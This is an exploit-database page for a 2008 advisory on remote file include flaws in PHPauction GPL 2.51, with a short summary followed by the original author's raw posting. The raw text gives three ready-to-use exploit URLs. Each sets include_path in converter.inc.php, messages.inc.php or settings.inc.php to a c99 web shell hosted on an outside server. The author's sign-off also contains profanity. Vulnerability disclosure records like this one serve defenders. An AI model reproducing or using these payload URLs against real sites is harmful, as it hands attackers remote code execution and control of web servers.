header-logo
Suggest Exploit
vendor:
PHPauction GPL Enhanced
by:
RoMaNcYxHaCkEr
8.8
CVSS
HIGH
Multiple Remote File Include Vulnerabilities
98
CWE
Product Name: PHPauction GPL Enhanced
Affected Version From: 2.51
Affected Version To: 2.51
Patch Exists: Yes
Related CWE: N/A
CPE: a:phpauction:phpauction_gpl_enhanced:2.51
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

PHPauction GPL 2.51 Multiple Remote File Include Vulnerabilities

Multiple Remote File Include Vulnerabilities exist in the PHPauction GPL 2.51 software. The vulnerabilities are present in the converter.inc.php, messages.inc.php and settings.inc.php files. An attacker can exploit these vulnerabilities by sending a specially crafted HTTP request containing a malicious URL in the include_path parameter. This can allow the attacker to execute arbitrary code on the vulnerable system.

Mitigation:

Upgrade to the latest version of PHPauction GPL 2.51 software.
Source

Exploit-DB raw data:

# Name : PHPauction GPL 2.51 Multiple Remote File Include Vulnerabilities

# Download From : http://www.johnrayfield.com/phpauction/phpauction-gpl-enhanced-251.zip

# Found By : RoMaNcYxHaCkEr     [RoMaNTiC-TeaM]  ( BlackxHat , BlackBox , alwheed )        

# Home Page :  WwW.4RxH.CoM              

+============================================================================+

# Vulne Codes In Files converter.inc.php & messages.inc.php & settings.inc.php In Differnet Lines

# Exploits :

http://4RxH.CoM/auction/includes/converter.inc.php?include_path=http://rxh.freehostia.com/shells/c99in.txt?

http://4RxH.CoM/auction/includes/messages.inc.php?include_path=http://rxh.freehostia.com/shells/c99in.txt?

http://4RxH.CoM/auction/includes/settings.inc.php?include_path=http://rxh.freehostia.com/shells/c99in.txt?

That,s It,s

Good Luck Everybody

+============================================================================+

# Greet To :

Tryag TeaM & All Members Of My Forum

# For Contact : RxH@HotMail.iT

# Note : Yesterday I Help You !! Tomorrow Fuck Me !!! Fuck All Snitches !!! But Do You Know What !!! That,s Is My Mistake

RxH

Best Wishes

# milw0rm.com [2008-03-17]

Navigation

Suggest Exploit

Services By CQR